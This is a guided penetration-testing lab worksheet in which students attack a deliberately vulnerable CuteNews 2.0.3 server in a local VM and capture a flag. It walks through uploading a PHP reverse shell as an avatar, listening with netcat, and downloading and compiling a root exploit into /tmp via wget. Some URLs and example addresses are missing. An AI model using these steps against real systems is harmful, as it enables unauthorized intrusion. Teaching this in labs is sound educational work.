Cyber Security Penetration Testing Activity v2
Cyber Security Penetration Testing Activity v2
Cyber Security Penetration Testing Activity v2
This activity is a guided penetration testing activity that does not require much prior knowledge
about computer security. However, basic knowledge of computers, i.e. how to execute commands,
is required. Do not attempt to hack into any computers without permission from the owners. This
is illegal!
The company FastNews Ltd. is planning to deploy a news server. Their news server will be based on
CuteNews 2.0.3 (, a free news management system, and will run on a machine
with Ubuntu 14.04 Linux operating system ( FastNews Ltd. has set up a
test server and contracted you to find out whether their setup is secure and can be deployed. You
have no physical access to the machine, and you can only access their test server via the network.
Being a skilled ethical hacker you start your work immediately…
To test the security of the server you will use a computer with Kali Linux ( Kali is
a Linux distribution developed for security testing. Both the Kali computer and the test server will
run as virtual machines inside your physical PC using VirtualBox (
Start the Oracle VirtualBox Manager application. You should see a window as in the following
Start the Kali VM (hacker’s computer) and the FastNews Server VM (test server) by double clicking
on the names. For each virtual machine a window will appear which shows the boot process.
Booting will take a minute or two and is completed when you see a login prompt.
You are not allowed to directly login in to the Server VM at any time. Login to your Kali machine with
the user name “root” and password “toor” as follows.
Open a command line window by clicking on Terminal Emulator under Applications as shown below.
Remember hackers always use command line windows .
ifconfig eth0
The network address is the in the second line of the output following the keyword “inet”. For
example, in the following picture it is Write down the KALI_ADDRESS address as you will
need it later.
Now let’s find out the network address of the server we are testing using the following command
(replace below with your KALI_ADDRESS):
nmap will scan the network for active hosts and print out a list of addresses. Addresses ending with
.1, .2 or .3 are the local router and you will also see an entry for KALI_ADDRESS. The remaining IP
address is the target server. For example, in the picture below the network address of the server is Write down the SERVER_ADDRESS as you will need it later.
From the output of nmap (shown below) we can see that there is only a single service running,
namely an Apache 2.4.7 web server on port 80. No other open ports means the only remote attack
vector is through the web server.
Finding a way in
From the web page we can’t see any ways into the server directly. OK, let’s check if this particular
version of CuteNews has any vulnerabilities we can exploit. Exploit Engine (https://www.exploit- is a search engine for vulnerabilities. Searching for CuteNews 2.0.3 we find the following
exploit related to file upload: The exploit description
has details on how do it:
The idea is to create an account and then instead of an avatar picture upload a PHP script that is
executed on the server. Great so let’s follow these instructions.
On the personal option page you can upload a file for use as an avatar picture. Instead of a picture
we will upload a script that creates a backdoor into the system. As backdoor we will use a PHP
reverse shell, which the web server will execute (it is called a reverse shell because the server will
open a connection to our Kali machine). The shell is from
shells/php-reverse-shell but you already find php-reverse-shell.php in the /root directory of
your Kali machine. Open the script with an editor (Applications->Accessories->Leafpad) and change
the network address in the line “$ip = ‘A.B.C.D’; // CHANGE THIS” to KALI_ADDRESS (that you
learned above). Save the modified file.
Switch back to the web browser and go to the personal options page and select the PHP reverse
shell as avatar image. Click on the “Save Changes” button.
The PHP script will open a connection from the server to our Kali machine. We use a tool called
netcat to act as listener on the Kali machine. Go back to your command line window and run:
nc –lvp 1234
Note that the port specified (1234) needs to the same as specified in the PHP script.
How do we activate our backdoor into the server? Switch back to your web browser. If you look at
the page source code again after you have uploaded the image, which is in fact a PHP script, it shows
the location of the image, as the image is displayed on the web page. From the img src it is clear that
the script has been renamed into avatar_USER_NAME_php-reverse-shell.php and resides in the
uploads directory. So let’s load the URL http://SERVER_ADDRESS/uploads/avatar_USER_NAME_php-
There will be an error message and the browser will keep loading the page. This is because the PHP
script has an endless loop. Switch to your command line window where you started netcat. You will
see that a connection has been made and you can see a command prompt of the server.
You are now inside the server!!! You can enter a command, for example “ls -l” to list files in the
current directory.
The uid is the user ID we are logged in as. The user www-data is the user the web servers runs as.
Since our PHP script is executed by the web server we now have access to the server with
permissions of user www-data. Since all of our commands are executed under the permissions of
www-data and this user has very limited permissions, we are still very limited in what we can do on
the server. We can snoop around a bit, but lots of things are beyond our reach.
Let’s do better and get administrator privileges. First, check what exactly the operating system (OS)
on the server is with the following command:
uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015
i686 athlon i686 GNU/Linux
From the output we learn that the OS is Ubuntu 14.04. Consulting the exploit database again this
time searching for “Ubuntu 14.04” we find the following vulnerability that allows privilege escalation
and getting administrator permissions:
The exploit code is already on your Kali machine in the directories /root and /var/www/html/. It is
named ofs.c. We could use netcat to copy ofs.c to the server, but let’s do it in a simpler way. Open
another command line window on the Kali machine and start an Apache web server:
apachectl start
Now switch to the command line window on the server. As www-data user we have very limited
access but we have write permissions in directory /tmp. So go to /tmp on the server:
cd /tmp
And download the ofs.c file from the Kali machine to the server with the following command:
wget http://KALI_ADDRESS/ofs.c
Check that ofs.c is there with:
ls -l
The exploit is C source code that still needs to be compiled into an executable file. Let’s do that on
the server (luckily gcc, the C compiler, is on the server, but on Linux it often is installed by default):
You can see some output and the prompt changes from a $ to a # meaning we are the administrator
(root) now on the server. You can confirm this with the “id” command as shown below.
You own the server now . Capture the victory flag to prove it with:
cat /root/flag.txt
Well done. You need to contact FastNews Ltd. now to tell them their setup is completely insecure
and they should update the Ubuntu Linux operating system as well as CuteNews to more recent and
presumably more secure versions.
The end.
The target Simple VM focuses on the basics of web based hacking. The VM was created by Robert
Winkel and you can download it and get more information about it here:,141/
PicoCTF is a security game for middle and high school students (
Vulnhub has many virtual machine based penetration testing challenges ranging from simple
challenges to very advanced challenges (
KALI_ADDRESS _____________________________
SERVER_ADDRESS ___________________________
USER_NAME _______________________________
Password __________________________________